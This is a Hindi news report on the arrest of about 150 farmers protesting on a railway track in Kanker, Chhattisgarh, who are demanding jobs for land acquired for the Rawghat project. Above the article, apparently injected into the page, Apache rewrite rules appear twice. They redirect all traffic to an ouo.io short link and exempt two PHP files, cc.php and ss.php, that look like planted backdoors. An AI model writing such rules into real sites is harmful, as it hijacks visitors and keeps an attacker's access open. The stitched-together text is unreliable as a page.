
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 350
Nextकांकेर। छत्तीसगढ़ के कांकेर में आज सुबह पुलिस ने रेलवे ट्रैक पर धरना दे रहे करीब 150 किसानों को गिरफ्तार कर लिया। ये किसान रावघाट परियोजना के लिए अधिग्रहित की गई जमीन के बदले नौकरी की मांग कर रहे थे। इसी मांग को लेकर किसान पिछले दो सप्ताह से रेलवे ट्रैक पर ही धरने पर बैठ गए थे।
कांकेर के भानुप्रतापुर थाना क्षेत्र में हो रहे धरना प्रदर्शन को लेकर प्रशासन ने कई बार समझाइस दी। किसानों से कलेक्टर सहित अन्य अधिकारियों ने चर्चा की कोशिश की, लेकिन किसान अपनी मांग पर अडिग थे। इसके बाद आज सुबह प्रशासन ने दल बल के साथ किसानों को गिरफ्तार किया।
बता दें कि रावघाट प्रोजेक्ट के लिए रावघाट तक रेलवे लाइन बिछाने का काम पूरा कर लिया गया है। इस लाइन पर अब ट्रेन चलाकर ट्रायल करना है। रेल पटरी पर ही धरना दे रहे किसानों के चलते रेलवे ट्रायल नहीं कर पा रहा था। इसको लेकर ही प्रशासन की समझाइश के बावजूद कोई नतीजा नहीं निकलने पर आज प्रदर्शनकारियों की अस्थाई गिरफ्तारी की गई।